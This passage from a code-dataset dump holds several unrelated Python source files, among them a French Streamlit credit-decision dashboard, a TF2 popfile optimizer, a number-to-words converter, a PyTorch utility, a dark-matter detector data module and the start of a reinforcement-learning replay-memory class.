ls='-', color='silver')\n ax.add_patch(FancyArrowPatch((client_feat, 1), (client_feat, 0), mutation_scale=20))\n label=['min','25%', '50%','75%', 'max']\n for i, x in enumerate(ax.get_xticks()):\n plt.text(x, -0.8, label[i], size=10, ha='center')\n return fig\n\n\ndef kde(df, feature, feat_disc):\n client_feat=float(df.loc[feature].values)\n bw_method=0.5\n xmin = feat_disc[0]\n xmax = feat_disc[4]\n # Plotting\n plt.style.use('seaborn')\n fig = plt.figure(figsize=(5, 5))\n g=df0[feature].plot(kind='kde',\n c='g',\n label='Non-defaulting clients',\n bw_method=bw_method,\n ind=None)\n df1[feature].plot(kind='kde',\n c='r',\n label='Defaulting clients',\n bw_method=bw_method,\n ind=None)\n ax=g.axes\n ax.axvline(client_feat, ls='--', color='r')\n fig.suptitle(\n f'Distribution de {feature} par rapport a la vrai classe des clients',\n y=0.95)\n plt.legend()\n plt.xlabel(feature)\n plt.ylabel('Probability density')\n plt.xlim(xmin, xmax)\n return(fig)\n\n\n###############################################################################\n############################## Menu global a gauche############################\n#################################################################################\nwith st.sidebar:\n st.image(logo)\n \n st.subheader('Menu')\n urlToCall = baseURL+'/clients'\n response = requests.get(urlToCall)\n data_dic = response.json() \n option=st.selectbox('Choisir un client ID: ', data_dic['ids'])\n \n #st.subheader('Menu')\n topic = st.radio(\n 'Choisir un theme',\n ( 'Décision','Informations générales', 'Interpretabilité', 'Analyse comparative', 'Analyse par genre'))\n \n \n urlToCall = baseURL + '/clients-info/' + str(option)\n client=requests.get(urlToCall)\n client=pd.read_json(client.text)\n\n\n\n\n######################################################################################\n # Decision#\n######################################################################################\n\nif topic=='Décision':\n st.title('Prêt à dépenser : Calculateur de droit au crédit')\n st.subheader('Décision sur l\\'éligibilité du client à un crédit') \n urlToCall = baseURL + '/clients/' + str(option)\n dic=requests.get(urlToCall)\n data_dic=dic.json()\n pred=data_dic['prediction']\n if pred==0:\n st.write('La demande de crédit est acceptée')\n else:\n st.write('La demande de crédit est refusée')\n \n######################Representation graphique tachymetre#################################\n \n proba_client=data_dic['proba'][1]\n thresh=data_dic['thresh']\n \n fig=tachymetre(proba_client,thresh)\n st.pyplot(fig)\n \n###################################################################################\n #General#\n################################################################################### \nif topic=='Informations générales':\n st.title('Informations générales sur le modèle')\n########################Graphe des feautures importances du model#######################\n st.subheader('Top 15 features importances générées par le modèle')\n #fig=graph_imp()\n st.image(importance, width=700)\n \n###################### Graphe des feature importances par Shap ######################## \n st.subheader('Impact moyen des indicateurs sur la décision (SHAP)')\n st.image(summary_mean)\n \n st.subheader('Shap summary plot : impact des indicateurs sur la prédiction de rejet par instance:')\n st.write ()\n st.image(summary)\n \n \n \n \n \n \n \n###########################################################################################\n #INTERPRETABILITE SHAP#\n###########################################################################################\n\nif topic=='Interpretabilité':\n st.title('Interprétation locale de la décision')\n st.write('L\\'interprétation locale donne l\\'influence indicateurs sur une prédiction de refus de crédit. ')\n#################Force plot d'un client selectionne############################### \n st.subheader('Shap force plot du client')\n def st_shap(plot, height=None):\n shap_html = f\"{shap.getjs()}{plot.html()}\"\n components.html(shap_html, height=height)\n urlToCall = baseURL + '/shap/' + str(option)\n \n dic=requests.get(urlToCall)\n data_dic=dic.json()\n expected=data_dic['expected']\n zipped=data_dic['shap']\n features, shap_values, values=zip(*zipped)\n \n #shap.initjs() \n plot=shap.force_plot(expected, np.array(shap_values), list(features))\n st_shap(plot, 200)\n \n \n################### Waterfall plot d'un client selectionne############################ \n \n \n st.subheader('Shap waterfall')\n explanation=(shap.Explanation(values=np.array(shap_values), base_values=expected, \n data=np.array(values), feature_names=list(features)))\n \n st.components.v1.html(shap.waterfall_plot(explanation, max_display = 15), width=15, height=0, scrolling=True)\n st.set_option('deprecation.showPyplotGlobalUse', False)\n\n st.pyplot(shap.waterfall_plot(explanation, max_display = 15))\n \n###########################################################################################\n #Analyse comparative avec les autres clients#\n###########################################################################################\n\nif topic=='Analyse comparative': \n st.title('Analyse comparative du client par rapport aux autres clients')\n \n st.subheader('Positionnement du client par rapport aux autres clients')\n sel_features = st.multiselect(\"Choisir les indicateurs :\", top9_feat, top9_feat[:2]) \n for i, feat in enumerate(sel_features):\n urlToCall = baseURL + '/feature-info/' + feat\n response = requests.get(urlToCall)\n data_dic = response.json()\n feat_disc=data_dic['feat']\n min_clients=data_dic['min_clients']\n max_clients=data_dic['max_clients']\n list_min=pd.DataFrame(min_clients, columns=['Client ID'])\n list_max=pd.DataFrame(max_clients, columns=['Client ID'])\n \n col1, col2, col3=st.columns([1, 3, 1])\n urlToCall1 = baseURL + '/kde/' +str(option) +'/'+ feat \n response=requests.get(urlToCall1)\n img = Image.open(BytesIO(response.content))\n col2.image(img, width=500)\n \n #fig=kde(client, feat, feat_disc)\n #st.pyplot(fig)\n st.write('Position du client', str(option),' par rapport a', feat)\n fig=minmax_plt(client, feat, feat_disc)\n st.pyplot(fig)\n \n col1, col2 = st.columns(2)\n with col1 : \n \n show_min = st.checkbox('Montrer la liste des clients ayant une valeur minimale', key=feat)\n if show_min:\n st.dataframe(list_min)\n \n with col2:\n show_max = st.checkbox('Montrer la liste des clients ayant une valeur maximale', key=i)\n if show_max:\n st.dataframe(list_max)\n \n \n \n \n###############################################################################\n#### Analyse par genre\n###############################################################################\nif topic == 'Analyse par genre':\n st.title('Exploration des indicateurs en fonction du genre du client')\n col1, col2=st.columns(2)\n with col1:\n client.columns=['Informations client '+ str(option)] \n st.subheader('Informations client')\n st.dataframe(client.loc[top10_feat])\n \n \n #fig=gender_dist_plot(client)\n #st.pyplot(fig)\n \n with col2:\n st.subheader('Distribution des clients par genre')\n st.image(genre, width=500)\n\n st.subheader('Situation du client par rapport aux indicateurs principals en fonction du genre')\n urlToCall = baseURL + '/gender/' + str(option) \n response=requests.get(urlToCall)\n img = Image.open(BytesIO(response.content))\n st.image(img, width=800)\n\n\n\n","repo_name":"MarwaHouri/Open-Classroom-Projet-7-Streamlit","sub_path":"P7-Streamlit.py","file_name":"P7-Streamlit.py","file_ext":"py","file_size_in_byte":11512,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14823754297","text":"import os,sys,re,logging as log\nimport argparse\nfrom keyvalues import KeyValues\n\n# Everything not alphanumeric will match this.\n# The + at the end means it'll match an entire block of such characters \n# instead of singular instances.\nREGEX_INVALID_TEMPLATE_KEY_CHARS=re.compile(r'[^a-zA-Z0-9]+')\n\n# Valid Keys.\nValidKeys = [\n\t'Action',\n\t'Advanced',\n\t'Attributes',\n\t'BeginAtWave',\n\t'BehaviorModifiers',\n\t'CanBotsAttackWhileInSpawnRoom',\n\t'CharacterAttributes',\n\t'Checkpoint',\n\t'Class',\n\t'ClassIcon',\n\t'CooldownTime',\n\t'DesiredCount',\n\t'DoneOutput',\n\t'Health',\n\t'InitialCooldown',\n\t'Item',\n\t'MaxActive',\n\t'MaxVisionRange',\n\t'Mission',\n\t'Name',\n\t'Objective',\n\t'OnBombDroppedOutput',\n\t'RandomChoice',\n\t'RespawnWaveTime',\n\t'RunForThisManyWaves',\n\t'Scale',\n\t'Skill',\n\t'Skin',\n\t'Sound',\n\t'SpawnCount',\n\t'Speed',\n\t'Squad',\n\t'StartingCurrency',\n\t'StartingPathTrackNode',\n\t'StartWaveOutput',\n\t'Support',\n\t'Tank',\n\t'Target',\n\t'TeleportWhere',\n\t'Template',\n\t'Templates',\n\t'TFBot',\n\t'TotalCount',\n\t'TotalCurrency',\n\t'WaitBeforeStarting',\n\t'WaitBetweenSpawns',\n\t'WaitForAllSpawned',\n\t'WaitWhenDone',\n\t'Wave',\n\t'WaveSchedule',\n\t'WaveSpawn',\n\t'WeaponRestrictions',\n\t'Where',\n]\n\n# Template data\ntemplates = {}\n\n# TFBot name -> ID associations\nname2template={}\n\n# Template usage counts\ntemplate_uses = {}\n\n# Times a certain template name has been used\nnamecounts={}\n\n# Errors and warning stats\nstats={\n\t'warnings':0,\n\t'errors':0\n}\n\n# Duh. Used for Where validation.\nValidSpawns=[\n\t# These ones are virtual.\n\t'BEHIND',\n\t'AHEAD'\n]\n\n# Load up our #base include\ndef importTemplates(file):\n\t_kv = KeyValues()\n\tlog.info(\"Loading {0}\".format(file))\n\t_kv.load(file)\n\tfor id in _kv['Templates']:\n\t\timportTemplate(id,_kv['Templates'][id])\n\ndef importSpawnPoints(file):\n\twith open(file,'r') as f:\n\t\tlog.info('Valid spawns loaded:')\n\t\tfor line in f:\n\t\t\tline=line.strip()\n\t\t\tValidSpawns.append(line)\n\t\t\tlog.info(' '+line)\n\n# Actually import the template\ndef importTemplate(id,template):\n\ttemplates[id]=template\n\tif 'Name' in templates[id]:\n\t\tname=templates[id]['Name']\n\t\tif 'Name' not in name2template:\n\t\t\tname2template[name]=id\n\t\telse:\n\t\t\tif type(name2template[name]) is list:\n\t\t\t\tname2template[name].append(id)\n\t\t\telse:\n\t\t\t\tname2template[name]=[name2template[name],id]\n\n# Export templates to a file.\ndef exportTemplates(file):\n\tkv = KeyValues('WaveSchedule')\n\tlog.info(\"Saving to {0}...\".format(file))\n\tkv['Templates']=KeyValues('Templates')\n\tfor id in templates:\n\t\tkv['Templates'][id]=templates[id]\n\tkv.save(file)\n\tlog.info(\"Saved {0} templates to {1}.\".format(len(templates),file))\n\t\n# Export an entire popfile.\ndef exportPopfile(kv,file):\n\tlog.info(\"Saving to {0}...\".format(file))\n\tif 'Templates' not in kv:\n\t\tkv['Templates']=KeyValues('Templates')\n\tskipped=[]\n\tnew_kv = KeyValues(\"Templates\")\n\tfor id in sorted(templates):\n\t\tif id in template_uses:\n\t\t\tnew_kv[id]=templates[id]\n\t\t\tnew_kv.set_comment(id,'Used {0} times'.format(template_uses[id]),0)\n\t\telse:\n\t\t\tskipped.append(id)\n\tkv['Templates']=new_kv\n\tkv.save(file)\n\tlog.info(\"Saved {0} templates to {1} ({2} skipped).\".format(len(kv['Templates']),file,len(skipped)))\n\ndef checkForValueDuplication(current,template,file,cwd):\n\tfor key in current:\n\t\tif key in template:\n\t\t\tif type(current[key]) is list:\n\t\t\t\tnewValue = []\n\t\t\t\tfor idx in range(len(current[key])):\n\t\t\t\t\tvalue = current[key][idx]\n\t\t\t\t\tckey = '{0}[{1}]'.format(key,idx)\n\t\t\t\t\tif type(template[key]) is list:\n\t\t\t\t\t\tif value in template[key]:\n\t\t\t\t\t\t\tlog.warning('{0} > {1}: Node \\'{2}\\' duplicates value {3}, removing.'.format(file,cwd,ckey,repr(template[key][idx])))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnewValue.append(value)\n\t\t\t\t\telse:\n\t\t\t\t\t\tif value == template[key]:\n\t\t\t\t\t\t\tlog.warning('{0} > {1}: Node \\'{2}\\' duplicates value {3}, removing.'.format(file,cwd,ckey,repr(template[key][idx])))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnewValue.append(value)\n\t\t\t\tif len(newValue) > 0:\n\t\t\t\t\tcurrent[key]=newValue\n\t\t\t\telse:\n\t\t\t\t\tdel(current[key])\n\t\t\telif type(current[key]) is KeyValues:\n\t\t\t\tcurrent[key]=checkForValueDuplication(current[key],template[key],file,cwd+'/'+key)\n\t\t\t\tif len(current[key])==0:\n\t\t\t\t\tdel(current[key])\n\t\t\telse:\n\t\t\t\tif template[key]==current[key]:\n\t\t\t\t\tdel(current[key])\n\t\t\t\t\tlog.warning('{0} > {1}: Node \\'{2}\\' duplicates value {3}, removing.'.format(file,cwd,key,repr(template[key])))\n\t\t\t\t\t\n\treturn current\n\t\ndef duplicateOf(a,b):\n\tfor key in a:\n\t\tif key in b:\n\t\t\tif type(a[key]) != type(b[key]):\n\t\t\t\treturn False\n\t\t\tif b[key]!=a[key]:\n\t\t\t\treturn False\n\treturn True\n\t\ndef makeOptimizedTemplate(current,file,cwd):\n\tname = current['Name']\n\tif name not in namecounts:\n\t\tnamecounts[name]=0\n\tnamecounts[name]+=1\n\tnameToUse=''\n\twhile True:\n\t\t#finalName=name.replace(\" \",\"_\")\n\t\tfinalName=REGEX_INVALID_TEMPLATE_KEY_CHARS.sub('_',name).strip('_')\n\t\tif namecounts[name]>1:\n\t\t\tfinalName='T_OPT_TFBot_{0}_{1}'.format(finalName,namecounts[name])\n\t\telse:\n\t\t\tfinalName='T_OPT_TFBot_{0}'.format(finalName)\n\t\tif (finalName in templates and duplicateOf(current,templates[finalName])) or finalName not in templates:\n\t\t\tnameToUse=finalName\n\t\t\tbreak\n\t\tnamecounts[name]+=1\n\timportTemplate(nameToUse,current)\n\tif nameToUse not in template_uses:\n\t\ttemplate_uses[nameToUse]=1\n\telse:\n\t\ttemplate_uses[nameToUse]+=1\n\tcurrent=KeyValues()\n\tcurrent['Template'] = nameToUse\n\treturn current\n\ndef scanForInvalidTemplates(kv,file,path):\n\tif type(kv) is list:\n\t\tfor i in range(len(kv)):\n\t\t\tvalue = kv[i]\n\t\t\tcwdp=path[:]\n\t\t\tcwdp[-1]=path[-1]+'[{0}]'.format(i)\n\t\t\tcwd = '/'.join(cwdp)\n\t\t\t#print(cwd)\n\t\t\t#print((' '*(len(cwdp)+1))+' [{0}] = {1}'.format(i,type(value)))\n\t\t\tif type(value) is list or type(value) is KeyValues:\n\t\t\t\tkv[i]=scanForInvalidTemplates(value,file,cwdp)\n\t\t\t\tcontinue\n\t\treturn kv\n\tfor key in kv:\n\t\tif key not in kv:\n\t\t\tcontinue\n\t\tvalue=kv[key]\n\t\tcwdp = path+[key]\n\t\tparent=cwdp[-2]\n\t\t#print((' '*len(cwdp))+' {0} = {1}'.format(key,type(value)))\n\t\tcwd = '/'.join(cwdp)\n\t\tif key not in ValidKeys:\n\t\t\tif parent not in ['Templates','CharacterAttributes']:\n\t\t\t\tfoundCorrectCase=False\n\t\t\t\tfor vkey in ValidKeys:\n\t\t\t\t\tif vkey.lower() == key.lower():\n\t\t\t\t\t\tlog.warning('{0} > {1}: Key \"{2}\" has bad capitalization! The correct form is \"{3}\".'.format(file,cwd,key,vkey))\n\t\t\t\t\t\tstats['warnings']+=1\n\t\t\t\t\t\tfoundCorrectCase=True\n\t\t\t\t\t\ttemp = kv[key]\n\t\t\t\t\t\tdel kv[key]\n\t\t\t\t\t\tkv[vkey] = temp\n\t\t\t\t\t\tkey=vkey\n\t\t\t\t\t\tbreak\n\t\t\t\tif not foundCorrectCase:\n\t\t\t\t\tlog.warning('{0} > {1}: Unidentified key \"{2}\"!'.format(file,cwd,key))\n\t\t\t\t\tstats['warnings']+=1\n\t\tif type(value) is list or type(value) is KeyValues:\n\t\t\tkv[key]=scanForInvalidTemplates(value,file,cwdp)\n\t\t\tif type(value) is list:\n\t\t\t\tif key == 'Wave':\n\t\t\t\t\t#print(repr(value))\n\t\t\t\t\tfor i in range(len(value)):\n\t\t\t\t\t\tkv.set_comment_list(key,i,'Wave {0}'.format(i+1),1)\n\t\t\t\tif key == 'WaveSpawn' and cwdp[-2].split('[')[0] == 'Wave':\n\t\t\t\t\tparentWaveNumber = cwdp[-2].split('[')[1].strip(']')\n\t\t\t\t\tparentWaveNumber = int(parentWaveNumber)\n\t\t\t\t\tif type(value) is list:\n\t\t\t\t\t\tfor i in range(len(value)):\n\t\t\t\t\t\t\tkv.set_comment_list(key,i,'Wave {0}.{1}'.format(parentWaveNumber+1,i+1),1)\n\t\t\t\t\telif type(value) is KeyValues:\n\t\t\t\t\t\tkv.set_comment(key,'Wave {0}.{1}'.format(parentWaveNumber+1,1),1)\n\t\t\tcontinue\n\t\tif key == 'Where':\n\t\t\tif value not in ValidSpawns:\n\t\t\t\tlog.warning('{0} > {1}: Spawnpoint \"{2}\" not defined on the map!'.format(file,cwd,value))\n\t\t\t\tstats['warnings']+=1\n\t\tif key == 'Template':\n\t\t\tif value not in templates:\n\t\t\t\tlog.warning('{0} > {1}: Unable to find Template \"{2}\"!'.format(file,cwd,value))\n\t\t\t\tstats['warnings']+=1\n\t\t\tif 'Templates' in cwdp:\n\t\t\t\tprint(repr(cwd))\n\t\t\telse:\n\t\t\t\tif cwdp[-2].split('[')[0] != 'TFBot':\n\t\t\t\t\tlog.warning('{0} > {1}: Template directive contained in \"{2}\" instead of TFBot!'.format(file,cwd,cwdp[-2].split('[')[0]))\n\t\t\t\t\tstats['warnings']+=1\n\t\t\tif value not in template_uses:\n\t\t\t\ttemplate_uses[value]=1\n\t\t\telse:\n\t\t\t\ttemplate_uses[value]+=1\n\t\t\t# Check to see if values match parent\n\t\t\tif value in templates:\n\t\t\t\tkv=checkForValueDuplication(kv,templates[value],file,cwd)\n\t\t\t\n\t\tif cwdp[-2].split('[')[0] == 'TFBot' or cwdp[-2] == 'Templates':\n\t\t\tif key == 'Name':\n\t\t\t\tif value in name2template:\n\t\t\t\t\tif type(name2template[value]) is not list:\n\t\t\t\t\t\tlog.warning('{0} > {1}: TFBot named \"{2}\" might needs Template \"{3}\"! This has automatically been done for you.'.format(file,cwd,value,name2template[value]))\n\t\t\t\t\t\tkv['Template']=name2template[value]\n\t\t\t\t\t\tkv._children.move_to_end('Template',last=False)\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Check to see if values match parent\n\t\t\t\t\t\tfixedCwd = '/'.join(cwdp[:-1])\n\t\t\t\t\t\tkv=checkForValueDuplication(kv,templates[name2template[value]],file,fixedCwd)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif name2template[value] not in template_uses:\n\t\t\t\t\t\t\ttemplate_uses[name2template[value]]=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttemplate_uses[name2template[value]]+=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog.warning('{0} > {1}: TFBot named \"{2}\" might need a Template from any of the following examples:'.format(file,cwd,value))\n\t\t\t\t\t\tfor tplID in name2template[value]:\n\t\t\t\t\t\t\tlog.info(' Template \"{0}\"'.format(tplID))\n\t\t\t\t\tstats['warnings']+=1\n\t\t\t\telse:\n\t\t\t\t\t# Optimize\n\t\t\t\t\tkv = makeOptimizedTemplate(kv,file,cwd)\n\treturn kv\n\t\n#importTemplates('includes/robot_standard.pop')\n#importTemplates('includes/robot_giant.pop')\n\nparser = argparse.ArgumentParser(description='Clean up and optimize TF2 MvM Popfiles')\n\n# -o --output Specify output file\nparser.add_argument('-o', '--output', nargs='?', default='', help='Specify where the completed file should go')\n# -i --include Include templates from a file\nparser.add_argument('-i', '--include', nargs='*', default=['includes/robot_giant.pop','includes/robot_standard.pop'], help='Include templates from a file')\n# -s --spawnpoints Load valid spawnpoint targetnames from a file\nparser.add_argument('-s', '--spawnpoints', nargs='?', default='', help='Load valid spawnpoint targetnames from a file')\nparser.add_argument('input_file', nargs=1, help='The popfile to be processed.')\n\nargs = parser.parse_args()\n\noutfile = args.output\nif outfile == '':\n\toutfile=args.input_file+'.new'\noutfile = os.path.abspath(outfile)\noutdir = os.path.dirname(outfile)\nif not os.path.isdir(outdir):\n\tos.makedirs(outdir)\n\nlog.basicConfig(format='%(asctime)s [%(levelname)-8s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', filename=outfile+'.log',filemode='w',level=log.DEBUG)\n\nfor included_file in args.include:\n\timportTemplates(included_file)\n\nif args.spawnpoints != '':\n\timportSpawnPoints(args.spawnpoints)\n\nkv = KeyValues()\nkv.load(sys.argv[1])\nif 'Templates' in kv:\n\tfor id in kv['Templates']:\n\t\ttemplates[id]=kv['Templates'][id]\nlog.info('Loaded {0} templates.'.format(len(templates)))\n\nscanForInvalidTemplates(kv,args.input_file,['WaveSchedule'])\n\nlog.info('Finished scanning: {0} warnings, {1} errors.'.format(stats['warnings'],stats['errors']))\n\nlog.info('Used templates: {0}'.format(len(template_uses)))\nfor key in sorted(template_uses.keys()):\n\tlog.info('Template {0}: Used {1} times.'.format(key,template_uses[key]))\n\n#exportTemplates('PARSED_TEMPLATES.pop')\n\nexportPopfile(kv,outfile)\nlog.info('Exported to {0}.'.format(outfile))","repo_name":"N3X15/failtrain-30wave-popfiles","sub_path":"python/fixPopfiles.py","file_name":"fixPopfiles.py","file_ext":"py","file_size_in_byte":10967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26615799633","text":"import sys\n\n\ndef num2words(num):\n nums_20_90 = [\n \"Twenty\",\n \"Thirty\",\n \"Forty\",\n \"Fifty\",\n \"Sixty\",\n \"Seventy\",\n \"Eighty\",\n \"Ninety\",\n ]\n nums_0_19 = [\n \"Zero\",\n \"One\",\n \"Two\",\n \"Three\",\n \"Four\",\n \"Five\",\n \"Six\",\n \"Seven\",\n \"Eight\",\n \"Nine\",\n \"Ten\",\n \"Eleven\",\n \"Twelve\",\n \"Thirteen\",\n \"Fourteen\",\n \"Fifteen\",\n \"Sixteen\",\n \"Seventeen\",\n \"Eighteen\",\n \"Nineteen\",\n ]\n nums_dict = {\n 100: \"hundred\",\n 1000: \"thousand\",\n 1000000: \"million\",\n 1000000000: \"billion\",\n }\n if num < 20:\n return nums_0_19[num]\n if num < 100:\n return nums_20_90[num // 10 - 2] + (\n \"\" if num % 10 == 0 else \" \" + nums_0_19[num % 10]\n )\n # find the largest key smaller than num\n maxkey = max([key for key in nums_dict.keys() if key <= num])\n return (\n num2words(num // maxkey)\n + \" \"\n + nums_dict[maxkey]\n + (\"\" if num % maxkey == 0 else \" \" + num2words(num % maxkey))\n )\n\n\ndef float2words(num: str) -> str:\n if num == \"\":\n return \"\"\n num_str: str = num\n dct = {\n \"0\": \"zero \",\n \"1\": \"one \",\n \"2\": \"two \",\n \"3\": \"three \",\n \"4\": \"four \",\n \"5\": \"five \",\n \"6\": \"six \",\n \"7\": \"seven \",\n \"8\": \"eight \",\n \"9\": \"nine \",\n }\n ret = \" point \"\n\n for c in num_str:\n ret += dct[c]\n return ret\n\n\ndef convert(a: str, b: str) -> str:\n ret: str = a + b\n ret = ret.lower()\n head_word = ret.split(\" \")[0][0].upper() + ret.split(\" \")[0][1:]\n other_words = ret.split(\" \")[1:]\n ret = head_word + \" \"\n for w in other_words:\n ret += w + \" \"\n return ret\n\n\ndef main(lines):\n num_seisu: int = int(float(lines[0]))\n if \".\" in lines[0]:\n num_syousu = lines[0].split(\".\")[1]\n else:\n num_syousu = \"\"\n seisu_str: str = num2words(num_seisu)\n syousu_str: str = float2words(num_syousu)\n print(convert(seisu_str, syousu_str))\n\n\nif __name__ == \"__main__\":\n lines = []\n for l in sys.stdin:\n lines.append(l.rstrip(\"\\r\\n\"))\n main(lines)\n","repo_name":"mei28/Competitive-programing","sub_path":"money_forward2021/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9225498451","text":"import torch\n\n\ndef unsqueeze_like(tensor: torch.Tensor, like: torch.Tensor, dim=0):\n \"\"\"\n Unsqueeze last dimensions of tensor to match another tensor's number of dimensions.\n\n Args:\n tensor (torch.Tensor): tensor to unsqueeze\n like (torch.Tensor): tensor whose dimensions to match\n dim: int: starting dim, default: 0.\n \"\"\"\n n_unsqueezes = like.ndim - tensor.ndim\n if n_unsqueezes < 0:\n raise ValueError(f\"tensor.ndim={tensor.ndim} > like.ndim={like.ndim}\")\n elif n_unsqueezes == 0:\n return tensor\n else:\n return tensor[dim * (slice(None),) + (None,) * n_unsqueezes]\n","repo_name":"DavidRuhe/clifford-group-equivariant-neural-networks","sub_path":"models/modules/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"12717949758","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nfrom interp import interp1d\nfrom globalfnc import ConfidenceLevel, chi_squared1\npi = np.pi\n\nname = \"PICASSO\"\nmodulated = False\n\nenergy_resolution_type = \"Dirac\"\n# actually Bubble Nucleation, but similar enough to implement like Dirac\n\ndef EnergyResolution(e):\n return 0.5 * np.ones_like(e)\n\nFFSD = 'GaussianFFSD'\nFFSI = 'HelmFF'\nFF = {'SI': FFSI,\n 'SDPS': FFSD,\n 'SDAV': FFSD,\n }\ntarget_nuclide_AZC_list = np.array([[19, 9, 0.7981563864573104]])\ntarget_nuclide_JSpSn_list = \\\n np.array([[1./2, 0.4751 * np.sqrt(3./2 / pi), -0.0087 * np.sqrt(3./2 / pi)]])\ntarget_nuclide_mass_list = np.array([17.6969])\nnum_target_nuclides = target_nuclide_mass_list.size\n\ndef QuenchingFactor(e):\n return np.ones_like(e)\n\nEthreshold = 1.7\nEmaximum = 100\nERmaximum = np.inf\n\ndef Efficiency_ER(er):\n return np.ones_like(er)\n\nalpha = 5.\ndef Efficiency(e, er):\n return 1. - np.exp(alpha * (1. - er/e))\n\nExposure = 1. # not needed\nERecoilList = np.array([])\n\nBinSize = 1\n# BinEdges are actually threshold energies\nBinEdges_left = np.array([1.723498, 2.900465, 4.098237, 5.813693, 6.896901,\n 16.334835, 38.841959, 54.882078])\nBinEdges_right = 100 * np.ones(BinEdges_left.size)\n# BinData are rate values\nBinData = np.array([-6.027919, -0.317259, 1.586294, -0.190355, 0.,\n 1.395939, -0.253807, 1.332487])\n# BinError are rate errors\nBinError = np.array([7.170051, 1.77665, 9.073604, 9.200507, 1.269036,\n 1.649746, 1.77665, 4.63198])\nExpected_limit = BinData + np.sqrt(chi_squared1(ConfidenceLevel)) * BinError\n","repo_name":"Andreea-G/Codds_DarkMatter","sub_path":"src/Data/PICASSO.py","file_name":"PICASSO.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"45584420708","text":"# DRL-5G-Scheduler; Author: Zhouyou Gu (zhouyou.gu@sydney.edu.au);\n# Supervisors: Wibowo Hardjawana; Branka Vucetic;\n# This project is developed at Centre for IoT and Telecommunications at The University of Sydney,\n# under a project directly funded by Telstra Corporation Ltd., titled\n# ”Development of an Open Programmable Scheduler for LTE Networks”, from 2018 to 2019.\n# Reference: Z. Gu, C. She, W. Hardjawana, S. Lumb, D. McKechnie, T. Essery, and B. Vucetic,\n# “Knowledge-assisted deep reinforcement learning in 5G scheduler design:\n# From theoretical framework to implementation,” IEEE JSAC., to appear, 2021\n\nimport random\nfrom collections import namedtuple, deque\nfrom threading import Lock\n\nimport numpy as np\n\nfrom sim_src import StatusObject\nfrom sim_src.tb_logger import GLOBAL_LOGGER\n\n\nclass ReplayMemory(StatusObject):\n def save_step(self, state, action, reward, next_state, done, asynchronization=False):\n \"\"\"Add a new experience to memory.\n :param asynchronization:\n \"\"\"\n pass\n\n def sample(self, asynchronization=False):\n \"\"\"Randomly sample a batch of experiences from memory.\n :param asynchronization:\n \"\"\"\n pass\n\n def get_id(self):\n pass\n\n def get_size(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n pass\n\n def training_info(self, batch, training_info):\n pass\n\n\nSIM_REPLAY_MEMORY_CONFIG = namedtuple(\"SIM_REPLAY_MEMORY_CONFIG\", [\"batch_size\", \"buffer_size\", \"seed\"])\n\n\nclass SimReplayMemory(ReplayMemory):\n \"\"\"Fixed-size buffer to store experience tuples.\"\"\"\n\n def __init__(self, id, config):\n \"\"\"Initialize a ReplayBuffer object.\n Params\n ======\n buffer_size (int): maximum size of buffer\n batch_size (int): size of each training batch\n \"\"\"\n self.id = id\n self.config = config\n\n GLOBAL_LOGGER.get_tb_logger().add_text_of_object(\"REPLAY_MEMORY_CONFIG\", self.config)\n\n self.memory = deque(maxlen=self.config.buffer_size) # internal memory (deque)\n self.experience = namedtuple(\"Experience\", field_names=[\"state\", \"action\", \"reward\", \"next_state\", \"done\"])\n self.seed = random.seed(self.config.seed)\n self.step_lock = Lock()\n self.sample_lock = Lock()\n self.sample_lock.acquire() # allow save_step first\n\n def save_step(self, state, action, reward, next_state, done, asynchronization=False):\n \"\"\"Add a new experience to memory.\n :param asynchronization:\n \"\"\"\n if not asynchronization:\n self.step_lock.acquire()\n\n # self._print(\"step\")\n self.async_save_step(state, action, reward, next_state, done)\n\n if not asynchronization:\n self.sample_lock.release()\n\n def sample(self, asynchronization=False):\n \"\"\"Randomly sample a batch of experiences from memory.\n :param asynchronization:\n \"\"\"\n if not asynchronization:\n self.sample_lock.acquire()\n\n # self._print(\"sample\")\n ret = self.async_sample()\n\n if not asynchronization:\n self.step_lock.release()\n return ret\n\n def get_id(self):\n return self.id\n\n def get_size(self):\n \"\"\"Return the current size of internal memory.\"\"\"\n return len(self.memory)\n\n def status(self):\n print(\"len of memory\", len(self.memory), \"max size of memory\", self.memory.maxlen)\n\n def async_sample(self):\n if self.get_size() < self.config.batch_size * 10 and self.get_size() < self.config.buffer_size:\n ret = None\n else:\n experiences = random.sample(self.memory, k=self.config.batch_size)\n states = np.vstack([e.state for e in experiences if e is not None])\n actions = np.vstack([e.action for e in experiences if e is not None])\n rewards = np.vstack([e.reward for e in experiences if e is not None])\n next_states = np.vstack([e.next_state for e in experiences if e is not None])\n dones = np.vstack([e.done for e in experiences if e is not None])\n\n ret = (states, actions, rewards, next_states, dones)\n return ret\n\n def async_save_step(self, state, action, reward, next_state, done):\n e = self.experience(state, action, reward, next_state, done)\n self.memory.append(e)\n\n\nif __name__ == '__main__':\n print(\"test deque dropout when maxlen is reached\")\n deque_size = 5\n test_memory = deque(maxlen=deque_size)\n for i in range(deque_size + 5):\n test_memory.append(i)\n print(test_memory)\n experiences = random.sample(test_memory, k=int(deque_size / 2))\n print(experiences)\n print(test_memory.maxlen)\n print((1, 2))\n\n\n class TestReplayMemory(ReplayMemory):\n \"\"\"Fixed-size buffer to store experience tuples.\"\"\"\n\n def __init__(self, id, batch_size, buffer_size, seed):\n \"\"\"Initialize a 